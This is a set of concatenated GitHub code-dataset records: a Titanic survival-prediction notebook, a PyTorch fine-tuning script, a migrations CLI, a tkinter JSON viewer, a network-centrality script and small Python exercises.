test[\"Title\"].map({\"Mr\" : \"Mr\", \"Mrs\" : \"Mrs\", \"Miss\" : \"Miss\", \"Master\" : \"Master\"})\ntest[\"Title\"].fillna(\"Others\", inplace=True)\n\n#Data Visualization\nfig, ax1 = plt.subplots(nrows=1, ncols=1, figsize=(15,8))\nsns.countplot(data=train, x=\"Title\", hue=\"Survived\", ax=ax1)\n\n#Map titles to nominal values\ntrain[\"Title\"] = train[\"Title\"].map({\"Mr\" : 0, \"Mrs\" : 1, \"Miss\" : 2, \"Master\" : 3, \"Others\" : 4})\ntest[\"Title\"] = test[\"Title\"].map({\"Mr\" : 0, \"Mrs\" : 1, \"Miss\" : 2, \"Master\" : 3, \"Others\" : 4})\n\n#Drop names\ntrain.drop('Name', axis=1, inplace=True)\ntest.drop('Name', axis=1, inplace=True)\n\n\n# In[ ]:\n\n\n#Feature - Sex\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Sex'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Sex'].isnull().sum())\n\n#Data Visualization\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12,5))\nsns.pointplot(data=train, x=\"Sex\", y=\"Survived\", ax=ax1)\nsns.countplot(data=train, x=\"Sex\", hue=\"Survived\", ax=ax2)\n\n#Map to integer data\ntrain[\"Sex\"] = train[\"Sex\"].map({\"male\" : 0, \"female\" : 1})\ntest[\"Sex\"] = test[\"Sex\"].map({\"male\" : 0, \"female\" : 1})\n\n\n# In[ ]:\n\n\n#Feature - Age\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Age'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Age'].isnull().sum())\n\n#One of the way to deal with missing values is to replace them with mean of that feature values, \n#but since there are too many null entries, i will be categorizing these entries into \n#labels - [child, adult, old, missingdata]\n\ntrain[\"AgeCategory\"] = \"Adult\"\ntrain[\"AgeCategory\"].loc[train[\"Age\"] < 18 ] = \"Child\"\ntrain[\"AgeCategory\"].loc[train[\"Age\"] > 50 ] = \"Old\"\ntrain[\"AgeCategory\"].loc[train[\"Age\"].isnull()] = \"MissingData\"\n\ntest[\"AgeCategory\"] = \"Adult\"\ntest[\"AgeCategory\"].loc[train[\"Age\"] < 18 ] = \"Child\"\ntest[\"AgeCategory\"].loc[train[\"Age\"] > 50 ] = \"Old\"\ntest[\"AgeCategory\"].loc[train[\"Age\"].isnull()] = \"MissingData\"\n\n#Data Visualization\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12,5))\nsns.barplot(data=train, x=\"AgeCategory\", y=\"Survived\", ax=ax1, order=[\"Child\", \"Adult\", \"Old\", \"MissingData\"])\nsns.countplot(data=train, x=\"AgeCategory\", hue=\"Survived\", ax=ax2, order=[\"Child\", \"Adult\", \"Old\", \"MissingData\"])\n\n#Map to integer data\ntrain[\"AgeCategory\"] = train[\"AgeCategory\"].map({\"Child\" : 0, \"Adult\" : 1, \"Old\" : 2, \"MissingData\" : 3})\ntest[\"AgeCategory\"] = test[\"AgeCategory\"].map({\"Child\" : 0, \"Adult\" : 1, \"Old\" : 2, \"MissingData\" : 3})\n\n#Drop Age\ntrain.drop(\"Age\", axis=1, inplace=True)\ntest.drop(\"Age\", axis=1, inplace=True)\n\n\n# In[ ]:\n\n\n#Feature - Family\n\n#From sibSp and Parch, we can add whether a person has a family or not.\n#Also we will create another feature determining number of family members onboard.\n\ntrain['Family'] = train['SibSp'] + train['Parch'] + 1\ntrain['FamilySize'] = train['Family']\ntrain['FamilySize'].loc[train['Family'] == 1] = \"Small\"\ntrain['FamilySize'].loc[train['Family'] > 1] = \"Medium\"\ntrain['FamilySize'].loc[train['Family'] > 5] = \"Large\"\ntrain['Family'].loc[train['Family'] > 1] = 'withFamily'\ntrain['Family'].loc[train['Family'] == 1] = 'Alone'\n\ntest['Family'] = test['SibSp'] + test['Parch'] + 1\ntest['FamilySize'] = test['Family']\ntest['FamilySize'].loc[test['Family'] == 1] = \"Small\"\ntest['FamilySize'].loc[test['Family'] > 1] = \"Medium\"\ntest['FamilySize'].loc[test['Family'] > 5] = \"Large\"\ntest['Family'].loc[test['Family'] > 1] = 'withFamily'\ntest['Family'].loc[test['Family'] == 1] = 'Alone'\n\n#Data Visualization\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12,5))\nsns.barplot(data=train, x=\"Family\", y=\"Survived\", ax=ax1)\nsns.countplot(data=train, x=\"Family\", hue=\"Survived\", ax=ax2)\nfig, (ax3, ax4) = plt.subplots(1, 2, figsize=(12,5))\nsns.barplot(data=train, x=\"FamilySize\", y=\"Survived\", ax=ax3, order=[\"Small\", \"Medium\", \"Large\"])\nsns.countplot(data=train, x=\"FamilySize\", hue=\"Survived\", ax=ax4, order=[\"Small\", \"Medium\", \"Large\"])\n\n#Map to integral values\ntrain[\"Family\"] = train[\"Family\"].map({\"Alone\" : 0, \"withFamily\" : 1})\ntrain[\"FamilySize\"] = train[\"FamilySize\"].map({\"Small\" : 0, \"Medium\" : 1, \"Large\" : 2})\ntest[\"Family\"] = test[\"Family\"].map({\"Alone\" : 0, \"withFamily\" : 1})\ntest[\"FamilySize\"] = test[\"FamilySize\"].map({\"Small\" : 0, \"Medium\" : 1, \"Large\" : 2})\n\n#Drop SibSp and Parch Columns\ntrain.drop([\"Parch\", \"SibSp\"], axis=1, inplace=True)\ntest.drop([\"Parch\", \"SibSp\"], axis=1, inplace=True)\n\n\n# In[ ]:\n\n\n#Feature - Fare\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Fare'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Fare'].isnull().sum())\n\n#Fill null values with mean fare\ntest['Fare'].fillna(train['Fare'].mean(), inplace=True)\n\n#Data Visualization\nfig = plt.figure(figsize=(15,8))\nplt.hist([train[train[\"Survived\"]==0][\"Fare\"], train[train[\"Survived\"]==1][\"Fare\"]], stacked=True, bins=20, label=['Dead', 'Survived'])\nplt.xlabel(\"Fare Range\")\nplt.ylabel(\"Count\")\nplt.legend()\n\n#Fare data contains some extreme values which can be normalized\nscale = preprocessing.MinMaxScaler()\ntrain['normalizedFare'] = scale.fit_transform(train['Fare'].reshape(-1,1))\n\n#Data Visualization\nfig = plt.figure(figsize=(15,8))\nplt.hist([train[train[\"Survived\"]==0][\"normalizedFare\"], train[train[\"Survived\"]==1][\"normalizedFare\"]], stacked=True, bins=10, label=['Dead', 'Survived'])\nplt.xlabel(\"Normalized Fare Range\")\nplt.ylabel(\"Count\")\nplt.legend()\n\ntest[\"normalizedFare\"] = scale.transform(test['Fare'].reshape(-1,1))\ntrain.drop(\"Fare\", axis=1, inplace=True)\ntest.drop(\"Fare\", axis=1, inplace=True)\n\n\n# In[ ]:\n\n\n#Feature - Embarked\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Embarked'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Embarked'].isnull().sum())\n\n#Fill missing values with maximum occurence of embarked category\nprint(\"Maximum Occurrence :\", train['Embarked'].describe()['top'])\ntrain['Embarked'].fillna('S', inplace=True)\ntest['Embarked'].fillna('S', inplace=True)\n\n#Data Visualization\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12,5))\nsns.pointplot(data=train, x=\"Embarked\", y=\"Survived\", ax=ax1)\nsns.countplot(data=train, x=\"Embarked\", hue=\"Survived\", ax=ax2)\n\n#Map Ports to integral values\ntrain[\"Embarked\"] = train[\"Embarked\"].map({\"S\" : 0, \"C\" : 1, \"Q\" : 2})\ntest[\"Embarked\"] = test[\"Embarked\"].map({\"S\" : 0, \"C\" : 1, \"Q\" : 2})\n\n\n# In[ ]:\n\n\n#Feature - Cabin\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Cabin'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Cabin'].isnull().sum())\n\n#We are also dropping Cabin feature, since it contains a lot of missing values and cannot be used as such.\ntrain.drop(\"Cabin\", axis=1, inplace=True)\ntest.drop(\"Cabin\", axis=1, inplace=True)\n\n\n# # Machine Learning Algorithm Analysis\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB \nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import svm\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier, VotingClassifier\n\n\n# In[ ]:\n\n\n#Divide data into input and target values\nX_train = train.drop(\"Survived\", axis=1)\ny_train = train[\"Survived\"]\n\n#create dictionary to keep track of accuracies\nAccuracy = {}\n\n\n# In[ ]:\n\n\nX_train.head(10)\n\n\n# In[ ]:\n\n\nX_train.describe()\n\n\n# In[ ]:\n\n\n#Method - Naive Bayes \n\n#Titanic Dataset is evaluated against all methods in Naive Bayes to decide on best approach.\n\n#Gaussian\nGNB = GaussianNB()\nscores = cross_val_score(GNB, X_train, y_train, cv=5)\naccuracyGNB = scores.mean()\nprint(\"Gaussian Naive Bayes Accuracy :\", accuracyGNB)\n\n#Multinomial\nMNB = MultinomialNB()\nscores = cross_val_score(MNB, X_train, y_train, cv=5)\naccuracyMNB = scores.mean()\nprint(\"Multinomial Naive Bayes Accuracy :\", accuracyMNB)\n\n#Bernoulli\nBNB = BernoulliNB()\nscores = cross_val_score(BNB, X_train, y_train, cv=5)\naccuracyBNB = scores.mean()\nprint(\"Bernoulli Naive Bayes Accuracy :\", accuracyBNB)\n\n#Plot accuracies corresponding to various naive bayes methods\nfig, ax1 = plt.subplots(1, 1, figsize=(8,5))\nfig = sns.barplot(y=[accuracyGNB, accuracyMNB, accuracyBNB], x=[\"GaussianNB\", \"MultinomialNB\", \"BernoulliNB\"], ax=ax1)\nfig.set(xlabel=\"Naive Bayes Methods\", ylabel=\"Accuracy\")\n\n#Finally we decide to use Bernoulli Naive Bayes\nAccuracy[\"naiveBayes\"] = accuracyBNB\n\n\n# In[ ]:\n\n\n#Method - K Nearest Neighbors\n\n#Deciding K is very important factor for KNN.\n#Since target values are either 0 or 1. We have to set K value at least (possible outcomes + 1)3 \n#and maximum square root of number of training samples. We will use cross-validation technique to find optimal value of K.\n\n#Cross-Validation\naccuracy = []\nk_value = []\nfor k in range(3,int(np.sqrt(len(train)))):\n kNN = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(kNN, X_train, y_train, cv=5)\n accuracy.append(scores.mean())\n k_value.append(k)\n\n#Plot accuracies corresponding to value of K\nfig, ax1 = plt.subplots(1, 1, figsize=(15,8))\nfig = sns.pointplot(y=accuracy, x=k_value, ax=ax1)\nfig.set(xlabel=\"K Value\", ylabel=\"Accuracy\")\n\nprint(\"Maximum Accuracy :\", max(accuracy))\nprint(\"Value of K corresponding to maximum accuracy :\", k_value[accuracy.index(max(accuracy))])\n\n#Final value of K must correspond to maximum accuracy.\nkNN = KNeighborsClassifier(n_neighbors=k_value[accuracy.index(max(accuracy))])\nscores = cross_val_score(kNN, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"K Nearest Neighbor Accuracy :\", accuracy)\nAccuracy[\"kNN\"] = accuracy\n\n\n# In[ ]:\n\n\n#Method - Logistic Regreesion\n\nlogisticRegression = LogisticRegression()\nscores = cross_val_score(logisticRegression, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"Logistic Regreesion Accuracy :\", accuracy)\nAccuracy[\"logisticRegression\"] = accuracy\n\n\n# In[ ]:\n\n\n#Method - Support Vector Machine\n\n#We will be evaluating SVM with respect to linear kernel, RBF kernel and Polynomial kernel.\n\n#Linear Kernel\nSVML = svm.SVC(kernel=\"linear\")\nscores = cross_val_score(SVML, X_train, y_train, cv=5)\naccuracySVML = scores.mean()\nprint(\"Support Vector Machine Accuracy (Linear Kernel) :\", accuracySVML)\n\n#RBF Kernel\nSVMR = svm.SVC(kernel=\"rbf\")\nscores = cross_val_score(SVMR, X_train, y_train, cv=5)\naccuracySVMR = scores.mean()\nprint(\"Support Vector Machine Accuracy (RBF Kernel) :\", accuracySVMR)\n\n#Polynomial Kernel\nSVMP = svm.SVC(kernel=\"poly\")\nscores = cross_val_score(SVMP, X_train, y_train, cv=5)\naccuracySVMP = scores.mean()\nprint(\"Support Vector Machine Accuracy (Poly Kernel) :\", accuracySVMP)\n\n#Plot accuracies corresponding to various naive bayes methods\nfig, ax1 = plt.subplots(1, 1, figsize=(8,5))\nfig = sns.barplot(y=[accuracySVML, accuracySVMR, accuracySVMP], x=[\"Linear\", \"RBF\", \"Polynomial\"], ax=ax1)\nfig.set(xlabel=\"Kernels\", ylabel=\"Accuracy\")\n\n#Finally we decide to use Polynomial Kernel\nAccuracy[\"supportVectorMachine\"] = accuracySVMP\n\n\n# In[ ]:\n\n\n#Method - Decision Tree Classifier\n\ndecisionTree = DecisionTreeClassifier()\nscores = cross_val_score(decisionTree, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"Decision Tree Classifier Accuracy :\", accuracy)\nAccuracy[\"decisionTree\"] = accuracy\n\n#Feature Weightage\ndecisionTree.fit(X_train, y_train)\nfig = plt.figure(figsize=(15,8))\nfig = sns.barplot(y=list(decisionTree.feature_importances_), x=list(X_train.columns), color=\"orange\")\nfig.set(xlabel=\"features\", ylabel=\"Weights\")\n\n\n# In[ ]:\n\n\n#Method - Random Forest Classifier\n\nrandomForest = RandomForestClassifier(n_estimators=100)\nscores = cross_val_score(randomForest, X_train, y_train, cv=5)\nRFaccuracy = scores.mean()\nprint(\"Random Forest Classifier Accuracy :\", RFaccuracy)\nAccuracy[\"randomForest\"] = RFaccuracy\n\n#Feature Weightage\nrandomForest.fit(X_train, y_train)\nfig = plt.figure(figsize=(15,8))\nfig = sns.barplot(y=list(randomForest.feature_importances_), x=list(X_train.columns), color=\"orange\")\nfig.set(xlabel=\"features\", ylabel=\"Weights\")\n\n\n# In[ ]:\n\n\n#Method - AdaBoost Classifier\n\nadaBoost = AdaBoostClassifier(n_estimators=100)\nscores = cross_val_score(adaBoost, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"AdaBoost Classifier Accuracy :\", accuracy)\nAccuracy[\"adaBoost\"] = accuracy\n\n#Feature Weightage\nadaBoost.fit(X_train, y_train)\nfig = plt.figure(figsize=(15,8))\nfig = sns.barplot(y=list(adaBoost.feature_importances_), x=list(X_train.columns), color=\"orange\")\nfig.set(xlabel=\"features\", ylabel=\"Weights\")\n\n\n# In[ ]:\n\n\n#Method - Gradient Boosting Classifier\n\ngradientBoosting = GradientBoostingClassifier(n_estimators=100)\nscores = cross_val_score(gradientBoosting, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"Gradient Boosting Classifier Accuracy :\", accuracy)\nAccuracy[\"gradientBoosting\"] = accuracy\n\n#Feature Weightage\ngradientBoosting.fit(X_train, y_train)\nfig = plt.figure(figsize=(15,8))\nfig = sns.barplot(y=list(gradientBoosting.feature_importances_), x=list(X_train.columns), color=\"orange\")\nfig.set(xlabel=\"features\", ylabel=\"Weights\")\n\n\n# In[ ]:\n\n\n#Method - Voting Classifier\n\n#I have tried many combinations for voting classifiers, here is what i observed-\n# 1) Both gradient boosting and adaboost has similar weightage for features. Hence, I think adding\n# Only one classifier is fine.\n# 2) Naive Baeyes has least accuracy and is not much effective.\n# 3) Adding SVM somehow leads to decrease in accuracy(Maybe due to overfitting). Hence, removed.\n# 4) Even though decision tree and random forest uses same tree based algorithms, feature weightage is\n# totally different and hence effective.\n\nvotingClasssifier = VotingClassifier(estimators=[('KNN', kNN), ('LR', logisticRegression), (\"DT\", decisionTree), ('RF', randomForest), ('GB', gradientBoosting)], voting=\"hard\")\nscores = cross_val_score(votingClasssifier, X_train, y_train, cv=5)\naccuracy = scores.mean()\nprint(\"Voting Classifier Accuracy :\", accuracy)\nAccuracy[\"votingClasssifier\"] = accuracy\n\n\n# In[ ]:\n\n\nprint(Accuracy)\n\n\n# In[ ]:\n\n\n#Plot accuracies with repect to multiple methods\nfig = plt.figure(figsize=(15,8))\nfig = sns.pointplot(y=list(Accuracy.values()), x=list(Accuracy.keys()))\nfig.set(ylabel=\"Accuracy\", xlabel=\"Maching Learning Methods\")\n\n\n# In[ ]:\n\n\n#Create test data\nX_test = test.drop(\"PassengerId\", axis=1)\n\n#Run Voting Classifier for better results\nvotingClasssifier.fit(X_train, y_train)\ny_test = votingClasssifier.predict(X_test)\n\n\n# In[ ]:\n\n\nsubmission = pd.DataFrame({\n \"PassengerId\": test[\"PassengerId\"],\n \"Survived\": y_test\n })\nsubmission.to_csv('submission.csv', index=False)\n\n\n# ***Final Result against test set - 0.8134* \n","repo_name":"nischalshrestha/automatic_wat_discovery","sub_path":"Notebooks/py/manojsakhala/titanic-dataset-solution/titanic-dataset-solution.py","file_name":"titanic-dataset-solution.py","file_ext":"py","file_size_in_byte":16591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2423842030","text":"import torch\r\nfrom torch import nn, optim\r\nfrom torch.utils.data import Dataset, DataLoader\r\nimport torchvision\r\nfrom torchvision import transforms, models\r\nfrom torchvision.datasets import ImageFolder\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nfrom utils import show_images, train\r\n\r\n\r\n# 指定RGB三个通道的均值和方差来将图像通道归一化\r\ntrain_augs = transforms.Compose([\r\n transforms.RandomResizedCrop(size=224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225])\r\n])\r\n\r\ntest_augs = transforms.Compose([\r\n transforms.Resize(size=256),\r\n transforms.CenterCrop(size=224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225])\r\n])\r\n\r\n# 加载数据\r\ndata_dir = './Datasets'\r\ntrain_imgs = ImageFolder(os.path.join(data_dir, 'hotdog/train'), transform=train_augs)\r\ntest_imgs = ImageFolder(os.path.join(data_dir, 'hotdog/test'), transform=test_augs)\r\n\r\n# 修改输出层\r\npretrained_net = models.resnet18(pretrained=True)\r\npretrained_net.fc = nn.Linear(512, 2)\r\n\r\n# 对输出层和其他层设置不同的学习率。 其他层学习率小,对参数进行微调\r\noutput_params = list(map(id, pretrained_net.fc.parameters()))\r\nprint(output_params)\r\nfeature_params = filter(lambda p: id(p) not in output_params, pretrained_net.parameters())\r\nlr = 0.01\r\noptimizer = optim.SGD([{'params': feature_params},\r\n {'params': pretrained_net.fc.parameters(), 'lr': lr * 10}],\r\n lr=lr, weight_decay=0.001)\r\n\r\n\r\ndef train_fine_tuning(net, optimizer, batch_size=128, num_epochs=5):\r\n train_iter = DataLoader(train_imgs, batch_size=batch_size, shuffle=True)\r\n test_iter = DataLoader(train_imgs, batch_size=batch_size)\r\n device= torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n train(net, train_iter, test_iter, optimizer, device, num_epochs)\r\n\r\n\r\ntrain_fine_tuning(pretrained_net, optimizer)\r\n","repo_name":"hzxbzp/Pytorch-practice","sub_path":"Fine Tuning.py","file_name":"Fine Tuning.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30152203391","text":"import logging\nfrom functools import partial\n\nimport click\nfrom tornado.ioloop import IOLoop\nfrom tornado.options import options\n\nfrom . import migrate\n\n\n@click.group()\ndef cli():\n pass\n\n\n@click.group()\ndef migrations():\n pass\n\n\n@click.command()\n@click.option('--migrations_path', help='Python path to migrations package, e.g. perch.migrations')\n@click.option('--previous', help='The previous version of the resource to migrate')\n@click.argument('resource')\ndef create(resource, previous=None, migrations_path=None):\n \"\"\"Create an empty migration for a resource\"\"\"\n if migrations_path:\n file_path = migrate.create(resource, previous_version=previous, package=migrations_path)\n else:\n file_path = migrate.create(resource, previous_version=previous)\n\n click.secho('Created migration file: ' + file_path, fg='green')\n\n@click.command()\n@click.option('--port', help='The database port')\n@click.option('--url', help='The database URL')\n@click.option('--migrations_path', help='Python path to migrations package, e.g. perch.migrations')\ndef run(migrations_path=None, url=None, port=None):\n \"\"\"Run migrations\"\"\"\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n if url:\n url = str(url).rstrip('/')\n options.url_registry_db = url\n\n if port:\n options.db_port = int(port)\n\n if migrations_path:\n migrations = migrate.collect(migrations_path)\n else:\n migrations = migrate.collect()\n\n func = partial(migrate.run_migrations, migrations)\n IOLoop.instance().run_sync(func)\n\nmigrations.add_command(create)\nmigrations.add_command(run)\n\ncli.add_command(migrations)\n\n\nif __name__ == '__main__':\n cli()\n","repo_name":"openpermissions/perch","sub_path":"perch/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3817103320","text":"class Solution(object):\n def search(self, root):\n if root.left == None and root.right == None:\n return [str(root.val)]\n ans = []; pre = str(root.val)+\"->\"\n if root.left != None:\n ansl = self.search(root.left)\n for it in ansl:\n ans.append(pre+it)\n if root.right != None:\n ansr = self.search(root.right)\n for it in ansr:\n ans.append(pre+it)\n return ans\n def binaryTreePaths(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[str]\n \"\"\"\n if root == None:\n return []\n return self.search(root)","repo_name":"chaozc/leetcode","sub_path":"python/p257.py","file_name":"p257.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31135796376","text":"class Projeto:\n def __init__(self, codigo, titulo, responsavel):\n self.codigo = codigo\n self.titulo = titulo\n self.responsavel = responsavel\n\n def __eq__(self, other):\n if isinstance(other, Projeto):\n return self.codigo == other.codigo\n return False\n\n def __repr__(self):\n return f'Projeto(codigo={self.codigo}, titulo={self.titulo}, responsavel={self.responsavel})'\n\n\nclass Participacao(Projeto):\n def __init__(self, codigo, titulo, responsavel, data_inicio, data_fim, aluno):\n super().__init__(codigo, titulo, responsavel)\n self.data_inicio = data_inicio\n self.data_fim = data_fim\n self.aluno = aluno\n\n def __repr__(self):\n return f'Participacao(codigo={self.codigo}, titulo={self.titulo}, responsavel={self.responsavel}, ' \\\n f'data_inicio={self.data_inicio}, data_fim={self.data_fim}, aluno={self.aluno})'\n\n\nprojeto1 = Projeto(1, \"Projeto de Coreografias\", \"Beyoncé\")\nprojeto2 = Projeto(2, \"Sistema de Produção Musical\", \"Taylor Swift\")\nprojeto3 = Projeto(3, \"Pesquisa em Performance Vocal\", \"Katy Perry\")\n\nparticipacao1 = Participacao(1, \"Projeto de Coreografias\", \"Beyoncé\",\"2023-01-01\", \"2023-06-30\", \"SP0101\")\nparticipacao2 = Participacao(2, \"Sistema de Produção Musical\", \"Taylor Swift\",\"2023-02-01\", \"2023-07-31\", \"SP0102\")\nparticipacao3 = Participacao(3, \"Pesquisa em Performance Vocal\", \"Katy Perry\",\"2023-01-01\", \"2023-06-30\", \"SP0103\")\n\nprint(projeto1)\nprint(projeto2)\nprint(projeto3)\n\nprint(participacao1)\nprint(participacao2)\nprint(participacao3)","repo_name":"josineudo-arruda/estudo-python","sub_path":"source/07-orientação-a-objectos/exercícios/exer03.py","file_name":"exer03.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7242605752","text":"import json\r\nimport tkinter as tk\r\n\r\nfrom tkinter import filedialog\r\n\r\nclass ListItem(tk.Frame):\r\n def __init__(self, parent, name, data):\r\n super().__init__(master=parent)\r\n self.parent = parent\r\n self.name = name\r\n self.data = data\r\n self.is_leaf = not isinstance(data, dict) and not isinstance(data, list)\r\n self.list_items = []\r\n\r\n self.create_widgets()\r\n\r\n def create_widgets(self):\r\n label = tk.Label(self, text=self.name)\r\n label.bind(\"<Button-1>\", self.expand)\r\n label.pack()\r\n\r\n def expand(self, evt=None):\r\n if len(self.list_items) <= 0:\r\n if isinstance(self.data, dict):\r\n for key in self.data:\r\n self.list_items.append(ListItem(self, key, self.data[key]))\r\n self.list_items[-1].pack()\r\n elif isinstance(self.data, list):\r\n for i, item in enumerate(self.data):\r\n self.list_items.append(ListItem(self, f\"Element: {i}\", item))\r\n self.list_items[-1].pack()\r\n elif self.is_leaf:\r\n self.list_items.append(tk.Label(self, text=f\"{self.data}\"))\r\n self.list_items[-1].pack()\r\n else:\r\n print(\"NOT IMPLEMENTED\")\r\n else:\r\n for item in self.list_items:\r\n item.destroy()\r\n self.list_items = []\r\n\r\n \r\n\r\nclass App(tk.Tk):\r\n def __init__(self):\r\n super().__init__()\r\n self.geometry('800x300')\r\n self.title('JSON Viewer')\r\n self.create_widgets()\r\n self.data = None\r\n\r\n def upload_file(self, e=None):\r\n print(type(self.data))\r\n fname = filedialog.askopenfilename()\r\n new_data = {}\r\n with open(fname, 'r') as f:\r\n new_data = json.load(f)\r\n \r\n if self.data is not None:\r\n self.data.destroy()\r\n self.data = ListItem(self.scrollable_frame, \"root\", new_data)\r\n self.data.pack()\r\n\r\n def create_widgets(self):\r\n frame = tk.Frame(self)\r\n canvas = tk.Canvas(frame)\r\n self.scrollable_frame = tk.Frame(canvas)\r\n scrollbar = tk.Scrollbar(frame, orient=\"vertical\", command=canvas.yview)\r\n canvas.configure(yscrollcommand=scrollbar.set)\r\n\r\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\r\n canvas.pack(fill=tk.BOTH)\r\n canvas.create_window((0, 0), window=self.scrollable_frame, anchor='nw')\r\n self.scrollable_frame.bind(\"<Configure>\", lambda e: canvas.configure(scrollregion=canvas.bbox(\"all\")))\r\n\r\n button = tk.Button(self.scrollable_frame, text=\"Select File\", command=self.upload_file)\r\n button.pack(side=\"top\")\r\n\r\n self.data = ListItem(self.scrollable_frame, \"root\", {\r\n \"item1\" : 3,\r\n \"item2\" : \"Hi\",\r\n \"item3\" : False,\r\n \"item4\" : None,\r\n \"item5\" : [\r\n 56,\r\n 4,\r\n 345,\r\n 2854,\r\n 535\r\n ],\r\n })\r\n\r\n self.data.pack(fill=tk.BOTH)\r\n\r\n frame.pack(fill=tk.BOTH)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = App()\r\n app.mainloop()","repo_name":"DavidCarlyn/json_viewer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32716671724","text":"import networkx as nx\nimport numpy as np\nimport pickle\n\nG = nx.Graph()\nnode1, node2 = np.loadtxt(graph_input, usecols=(0,1), unpack=True)\n\nfor i in range(len(node1)):\n G.add_edge(node1[i], node2[i])\n\ngraph_num_node = G.number_of_nodes()\nprint(f\"This graph contains {graph_num_node} nodes. \")\n\ngraph_num_edge = G.number_of_edges()\nprint(f\"This graph contains {graph_num_edge} edges. \")\n\nnode_bet_central = nx.betweenness_centrality(G)\npickle.dump(node_bet_central, open(\"node_betweeen_centrality.pkl\", 'wb'))\n\nres = np.array([(int(key), node_bet_central[key]) for key in node_bet_central.keys() ])\nres_sorted = res[res[:,0].argsort()]\nax.xaxis.set_minor_locator(MultipleLocator(10))\n\n\npos = dict(zip(idx.astype(int), np.column_stack((x, y, z))))\n\npos = {}\nfor i in range(len(idx)):\n pos[str(int(idx[i]))] = (x[i], y[i], z[i])\n\nfor key in pos.keys():\n position[key] = {'posi': pos[key]}\n\nnx.set_node_attributes(G, poistion)\n\npos = nx.get_node_attributes(G, 'posi')\nn = G.number_of_nodes()\n\ndegrees = [val for (node, val) in G.degree()]\n\nedge_max = max(degrees)\ncolors = [plt.cm.plasma(degrees[i]/edge_max) for i in range(n)]\n\nwith plt.style.context(('ggplot')):\n fig = plt.figure(figsize=(10,7))\n ax = Axes3D(fig)\n\n for key, value in pos.items():\n xi = value[0]\n yi = value[1]\n zi = value[2]\n\n ax.scatter(xi, yi, zi, c=colors[key], s=20+20*G.degree(key), edgecolors='k', alpha=0.7)\n\n for i, j in enumerate(G.edges()):\n x = np.array((pos[j[0]][0], pos[j[1]][0]))\n y = np.array((pos[j[0]][1], pos[j[1]][1]))\n z = np.array((pos[j[0]][2], pos[j[1]][2]))\n ax.plot(x, y, z, c='black', alpha=0.5)\n\n ax.view_init(30, angle)\n ax.set_axis_off()\n\n plt.show()\n\n return\n\n\n","repo_name":"AspirinCode/MD-analysis-tools-scripts","sub_path":"network/calc_bet_centrality.py","file_name":"calc_bet_centrality.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"40192103835","text":"x = [ [5,2,3], [10,8,9] ] \nstudents = [\n {'first_name': 'Michael', 'last_name' : 'Jordan'},\n {'first_name' : 'John', 'last_name' : 'Rosales'}\n]\nsports_directory = {\n 'basketball' : ['Kobe', 'Jordan', 'James', 'Curry'],\n 'soccer' : ['Messi', 'Ronaldo', 'Rooney']\n}\nz = [ {'x': 10, 'y': 20} ]\n# 1\n\n# a\nx[1][0] = 15\nprint(x)\n# b\nstudents[0]['last_name'] = 'Bryant'\n# c\nsports_directory[\"soccer\"][0] = \"Andres\"\n# d\nz[0]['y'] = 30\n\n# 2\nstudents = [\n {'first_name': 'Michael', 'last_name' : 'Jordan'},\n {'first_name' : 'John', 'last_name' : 'Rosales'},\n {'first_name' : 'Mark', 'last_name' : 'Guillen'},\n {'first_name' : 'KB', 'last_name' : 'Tonel'}\n]\n\ndef iterateDictionary(some_list):\n for i in range 